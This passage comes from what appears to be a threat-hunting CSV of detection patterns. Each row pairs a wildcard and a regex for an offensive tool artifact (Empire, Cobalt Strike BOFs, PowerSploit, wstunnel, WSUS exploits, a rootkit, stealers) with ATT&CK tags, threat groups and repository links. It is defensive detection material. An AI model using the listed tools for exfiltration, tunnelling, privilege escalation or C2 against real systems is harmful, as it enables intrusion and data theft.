- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*WriteDLLPermission.txt*",".{0,1000}WriteDLLPermission\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Write-HijackDll*",".{0,1000}Write\-HijackDll.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Write-Nessus-Finding*",".{0,1000}Write\-Nessus\-Finding.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Nessus-Footer*",".{0,1000}Write\-Nessus\-Footer.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Nessus-Header*",".{0,1000}Write\-Nessus\-Header.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Write-Output 127.0.0.1:1111*",".{0,1000}Write\-Output\s127\.0\.0\.1\:1111.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*WritePayloadDll(LPWSTR pwszDllPath)*",".{0,1000}WritePayloadDll\(LPWSTR\spwszDllPath\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*WritePayloadDllTransacted*",".{0,1000}WritePayloadDllTransacted.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*Write-PortscanOut*",".{0,1000}Write\-PortscanOut.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Write-ServiceBinary*",".{0,1000}Write\-ServiceBinary.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit an unquoted service path vulnerability to spawn a beacon","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Write-UserAddMSI*",".{0,1000}Write\-UserAddMSI.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*ws://localhost:58082*",".{0,1000}ws\:\/\/localhost\:58082.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*wscript_elevator*",".{0,1000}wscript_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*WScriptBypassUAC*",".{0,1000}WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*wsl kali-linux*",".{0,1000}wsl\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WSPCoerce.ex*",".{0,1000}WSPCoerce\.ex.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*WSPCoerce-main*",".{0,1000}WSPCoerce\-main.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*wstunnel client *",".{0,1000}wstunnel\sclient\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel server *",".{0,1000}wstunnel\sserver\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel* --restrict-to 127.0.0.1:22*",".{0,1000}wstunnel.{0,1000}\s\-\-restrict\-to\s127\.0\.0\.1\:22.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel*cert.pem*",".{0,1000}wstunnel.{0,1000}cert\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel*key.pem*",".{0,1000}wstunnel.{0,1000}key\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel.exe *",".{0,1000}wstunnel\.exe\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel/pkgs/container/wstunnel*",".{0,1000}wstunnel\/pkgs\/container\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_darwin_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_arm64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_linux_armv7.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_armv7\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_windows_386.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_386\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*wstunnel_*_windows_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*WSUSpendu*",".{0,1000}WSUSpendu.{0,1000}","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wsuxploit*",".{0,1000}wsuxploit.{0,1000}","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","3","275","51","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z" "*wts_enum_remote_processes*",".{0,1000}wts_enum_remote_processes.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA=*",".{0,1000}wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*wumb0/rust_bof*",".{0,1000}wumb0\/rust_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*www.4everproxy.com/tor-proxy*",".{0,1000}www\.4everproxy\.com\/tor\-proxy.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*www.exploit-db.com/download/*",".{0,1000}www\.exploit\-db\.com\/download\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*www.kali.org/get-kali/*",".{0,1000}www\.kali\.org\/get\-kali\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*www.leviathansecurity.com/blog/tunnelvision*",".{0,1000}www\.leviathansecurity\.com\/blog\/tunnelvision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*www.nicerat.com*",".{0,1000}www\.nicerat\.com.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - 